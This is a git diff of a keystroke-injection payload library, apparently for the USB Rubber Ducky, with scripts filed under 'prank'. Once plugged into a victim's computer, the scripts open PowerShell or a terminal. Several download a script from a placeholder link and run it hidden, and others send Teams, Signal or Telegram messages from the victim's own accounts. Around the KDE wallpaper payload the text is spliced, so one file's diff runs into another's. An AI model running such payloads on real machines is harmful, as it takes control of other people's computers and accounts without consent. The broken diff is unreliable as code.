-STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
-ENTER
+STRINGLN Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
DELAY 1000
REM Execute the Python script
-STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
-ENTER
+STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
REM Close the PowerShell
DELAY 1000
diff --git a/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt b/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
index 704dd3f..151a556 100644
--- a/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
+++ b/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
@@ -1,36 +1,72 @@
-REM ######################################################
-REM # |
-REM # Title : Change Wallpaper With Screenshot |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ######################################################
-
-
-REM Requirements:
-REM - Internet Connection
-REM - ExecutionPolicy Bypass
-REM - Python
+REM_BLOCK
+######################################################
+# #
+# Title : Change Wallpaper With Screenshot #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+######################################################
+Requirements:
+ - Internet Connection
+ - ExecutionPolicy Bypass
+ - Python
+END_REM
REM REQUIRED - Set your Python script link
-DEFINE SCRIPT-PY-LINK example.com
+DEFINE #SCRIPT-PY-LINK example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
-
-STRING Invoke-WebRequest -Uri "
-STRING SCRIPT-PY-LINK
-STRING " -OutFile "script.py"
-ENTER
+STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 2000
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
diff --git a/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt b/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
index 3158172..2305c40 100644
--- a/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
+++ b/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
@@ -1,39 +1,58 @@
-REM ###########################################
-REM # |
-REM # Title : Change Desktop Wallpaper |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Linux (KDE based) |
-REM # |
-REM ###########################################
+REM_BLOCK
+###########################################
+# #
+# Title : Change Desktop Wallpaper #
+# Author : Aleff #
+# Version : 1.1 #
+# Category : Prank #
+# Target : Linux (KDE based) #
+# #
+###########################################
-REM Requirements:
-REM - Internet Connection
+Requirements:
+ - Internet Connection
+END_REM
+
+REM Replace 'example.com/IMAGE_NAME' with your image link
+DEFINE #IMAGE_LINK example.com/IMAGE_NAME
+
+REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
+DEFINE #IMAGE_PATH="file://example.jpg"
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-REM Replace 'example.com/IMAGE_NAME' with your image link
-DEFINE IMAGE_LINK example.com/IMAGE_NAME
-STRING wget
-STRING IMAGE_LINK
-ENTER
-
-REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
-DEFINE IMAGE_PATH="file://example.jpg"
+STRINGLN wget #IMAGE_LINK
REM It depends by the Internet Connection
DELAY 2000
-STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
STRINGLN (New-Object -ComObject WScript.Shell).SendKeys("{F11}")
diff --git a/payloads/library/prank/Full-ScreenBannerJoke/payload.txt b/payloads/library/prank/Full-ScreenBannerJoke/payload.txt
index b6bc903..e304170 100644
--- a/payloads/library/prank/Full-ScreenBannerJoke/payload.txt
+++ b/payloads/library/prank/Full-ScreenBannerJoke/payload.txt
@@ -1,36 +1,73 @@
-
-REM ############################################
-REM # |
-REM # Title : Full-Screen Banner Joke |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ############################################
+REM_BLOCK
+############################################
+# #
+# Title : Full-Screen Banner Joke #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+############################################
-REM Requirements:
-REM - Internet Connection
-REM - Python installed
-REM - ExecutionPolicy Bypass
-
+Requirements:
+ - Internet Connection
+ - Python installed
+ - ExecutionPolicy Bypass
+END_REM
REM REQUIRED - Set your Python script link
-DEFINE SCRIPT-PY-LINK example.com
+DEFINE #SCRIPT-PY-LINK example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
-STRING Invoke-WebRequest -Uri "
-STRING SCRIPT-PY-LINK
-STRING " -OutFile "script.py"
-ENTER
+STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
diff --git a/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt b/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
index d3c0e85..1ea18b0 100644
--- a/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
+++ b/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
@@ -1,29 +1,69 @@
-REM ##################################################
-REM # |
-REM # Title : Play A Song Through Spotify |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ##################################################
-
-
-REM Requirements:
-REM - Internet Connection
-REM - Spotify installed and user logged-in
-REM - ExecutionPolicy Bypass
+REM_BLOCK
+##################################################
+# #
+# Title : Play A Song Through Spotify #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+##################################################
+Requirements:
+ - Internet Connection
+ - Spotify installed and user logged-in
+ - ExecutionPolicy Bypass
+END_REM
REM REQUIRED - Set your song name
-DEFINE SONG-NAME example
+DEFINE #SONG-NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
STRINGLN Start-Process "spotify://"
@@ -43,8 +83,7 @@ REM Some times popups of advertisements may come out and usually they will click
REM ESCAPE
REM DELAY 500
-STRING SONG-NAME
-ENTER
+STRINGLN #SONG-NAME
DELAY 1000
TAB
DELAY 500
diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
index 3712631..9b5b0ed 100644
--- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
+++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
@@ -1,12 +1,14 @@
-REM #####################################################
-REM # #
-REM # Title : Prank In The Middle - Thunderbird #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Prank #
-REM # Target : Windows 10/11 #
-REM # #
-REM #####################################################
+REM_BLOCK
+#####################################################
+# #
+# Title : Prank In The Middle - Thunderbird #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+#####################################################
+END_REM
EXTENSION DETECT_READY
REM VERSION 1.1
@@ -38,8 +40,7 @@ END_EXTENSION
REM Open Thunderbird and goto settings
GUI r
-STRING thunderbird
-ENTER
+STRINGLN thunderbird
DELAY 1000
REPEAT 4 TAB
ENTER
@@ -70,8 +71,7 @@ DELAY 500
REM Open the powershell and goto the directory
GUI r
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 1500
STRING cd
DELAY 500
diff --git a/payloads/library/prank/SendMessagesInTeams/payload.txt b/payloads/library/prank/SendMessagesInTeams/payload.txt
index 3ff4497..0212ff9 100644
--- a/payloads/library/prank/SendMessagesInTeams/payload.txt
+++ b/payloads/library/prank/SendMessagesInTeams/payload.txt
@@ -1,37 +1,82 @@
-REM ###########################################
-REM # |
-REM # Title : Send Messages In Teams |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###########################################
+REM_BLOCK
+###########################################
+# #
+# Title : Send Messages In Teams #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+###########################################
-REM Requirements:
-REM - Microsoft Teams installed and user logged-in
-REM - Internet Connection
-REM - ExecutionPolicy Bypass
-REM - Python
+Requirements:
+ - Microsoft Teams installed and user logged-in
+ - Internet Connection
+ - ExecutionPolicy Bypass
+ - Python
-REM 1. Open a powershell
-REM 2. Close if Teams is opens and reopen it
-REM 3. Goto search bar
-REM 4. Search the person by name, email, id or what you want...
-REM 5. Downarrow and enter to open the chat
+1. Open a powershell
+2. Close if Teams is opens and reopen it
+3. Goto search bar
+4. Search the person by name, email, id or what you want...
+5. Downarrow and enter to open the chat
+END_REM
REM REQUIRED - Name, email, id or what you want for contact the target
-DEFINE USER-ID example
-REM REQUIRED - Messages
-DEFINE MESSAGE1 example
-REM ...
-REM DEFINE MESSAGEN example..
+DEFINE #USER-ID example
+
+REM REQUIRED - Messages
+DEFINE #MESSAGE1 example
+
+REM ...
+REM DEFINE #MESSAGEN example..
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
REM #### Powershell ####
@@ -44,8 +89,7 @@ DELAY 10000
REM #### Teams ####
CTRL N
DELAY 2000
-STRING USER-ID
-ENTER
+STRINGLN #USER-ID
DELAY 2000
TAB
DELAY 1000
@@ -53,11 +97,10 @@ TAB
DELAY 1000
REM #### Messages ####
-STRING MESSAGE1
-ENTER
+STRINGLN #MESSAGE1
DELAY 1000
REM ...
-REM STRINGLN MESSAGEN
+REM STRINGLN #MESSAGEN
DELAY 500
ALT F4
diff --git a/payloads/library/prank/SendSignalMessages/payload.txt b/payloads/library/prank/SendSignalMessages/payload.txt
index 71c5263..95bee72 100644
--- a/payloads/library/prank/SendSignalMessages/payload.txt
+++ b/payloads/library/prank/SendSignalMessages/payload.txt
@@ -1,41 +1,83 @@
-REM #########################################
-REM # |
-REM # Title : Send Signal Messages |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank, Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM #########################################
+REM_BLOCK
+#########################################
+# #
+# Title : Send Signal Messages #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank, Execution #
+# Target : Windows 10-11 #
+# #
+#########################################
-REM Requirements:
-REM - Internet Connection
-REM - Signal App installed
-REM Payload Plug-And-Play but can be edited as you want the message
+Requirements:
+ - Internet Connection
+ - Signal App installed
+Payload Plug-And-Play but can be edited as you want the message
+END_REM
REM REQUIRED - Receiver number
-DEFINE NUMBER 3332211000
+DEFINE #NUMBER 3332211000
REM REQUIRED - Message to send
-DEFINE MESSAGE YOUR_MESSAGE
+DEFINE #MESSAGE example
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
-STRING Stop-Process -Name "Signal"
-ENTER
-STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
-ENTER
+STRINGLN Stop-Process -Name "Signal"
+DELAY 500
+STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
DELAY 5000
TAB
TAB
TAB
ENTER
DELAY 100
-STRING NUMBER
+STRING #NUMBER
DELAY 100
TAB
DELAY 100
@@ -44,8 +86,7 @@ DELAY 200
REM This is the message that will be sent.
REM You can change it as you want, if you want.
-STRING YOUR_MESSAGE
-ENTER
+STRINGLN #MESSAGE
REM Closing Signal App
DELAY 500
diff --git a/payloads/library/prank/SendTelegramMessages_Linux/payload.txt b/payloads/library/prank/SendTelegramMessages_Linux/payload.txt
index 10ab2b3..0d057ed 100644
--- a/payloads/library/prank/SendTelegramMessages_Linux/payload.txt
+++ b/payloads/library/prank/SendTelegramMessages_Linux/payload.txt
@@ -1,37 +1,64 @@
-
-REM #########################################
-REM # |
-REM # Title : Send Telegram Messages |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Linux |
-REM # |
-REM #########################################
+REM_BLOCK
+#########################################
+# #
+# Title : Send Telegram Messages #
+# Author : Aleff #
+# Version : 1.1 #
+# Category : Prank #
+# Target : Linux #
+# #
+#########################################
-REM Requirements:
-REM - Internet Connection
-REM - telegram-desktop installed and activated
+Requirements:
+ - Internet Connection
+ - telegram-desktop installed and activated
+END_REM
+
+REM Define the message receiver username
+DEFINE #USERNAME @example
+
+REM Define the message(s)
+DEFINE #MESSAGE1 example
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-STRING telegram-desktop
-ENTER
+STRINGLN telegram-desktop
REM It depends by the computer...
DELAY 3000
-REM Define the message receiver username
-DEFINE USERNAME @example
-STRING USERNAME
-ENTER
+STRINGLN #USERNAME
DELAY 500
-REM Define the message(s)
-DEFINE MESSAGE1 example
-STRING MESSAGE1
-ENTER
+STRINGLN #MESSAGE1
DELAY 500
REM other messages here...
REM ...
diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
index 9abbe92..8c4fa42 100644
--- a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
+++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
@@ -1,33 +1,70 @@
-REM ############################################
-REM # |
-REM # Title : The Mouse Moves By Itself |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10/11 |
-REM # |
-REM ############################################
-
-
-REM Requirements:
-REM - Internet Connection
+REM_BLOCK
+############################################
+# #
+# Title : The Mouse Moves By Itself #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+############################################
+Requirements:
+ - Internet Connection
+END_REM
REM REQUIRED - Set your Python script link
-DEFINE SCRIPT-PY-LINK example.com
+DEFINE #SCRIPT-PY-LINK example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
-STRING Invoke-WebRequest -Uri "
-STRING SCRIPT-PY-LINK
-STRING " -OutFile "script.py"
-ENTER
+STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
diff --git a/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt b/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
index e6ee5ab..c2f036f 100644
--- a/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
+++ b/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
@@ -1,15 +1,18 @@
-REM ############################################################
-REM # #
-REM # Title : This damn shell doesn't work, SO SAD! :C #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Prank #
-REM # Target : Linux #
-REM # #
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : This damn shell doesn't work, SO SAD! :C #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Linux #
+# #
+############################################################
+
+Requirements:
+ - Nothing <3
+END_REM
-REM Requirements:
-REM - Nothing <3
REM With Kali Linux 2020.4, the new default shell is now ZSH for users who install the distribution.
DEFINE #TARGET_KALI_LINUX TRUE
diff --git a/payloads/library/prank/Try_To_Catch_Me/payload.txt b/payloads/library/prank/Try_To_Catch_Me/payload.txt
index d9eb8e7..84d591e 100644
--- a/payloads/library/prank/Try_To_Catch_Me/payload.txt
+++ b/payloads/library/prank/Try_To_Catch_Me/payload.txt
@@ -1,27 +1,26 @@
-REM ####################################
-REM # |
-REM # Title : Try To Catch Me |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10/11 |
-REM # |
-REM ####################################
+REM_BLOCK
+####################################
+# #
+# Title : Try To Catch Me #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+####################################
-
-REM Requirements:
-REM - Python
-REM - Internet Connection
+Requirements:
+ - Python
+ - Internet Connection
+END_REM
REM REQUIRED - Set your Python script link
DEFINE #SCRIPT-PY-LINK example.com
-
DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"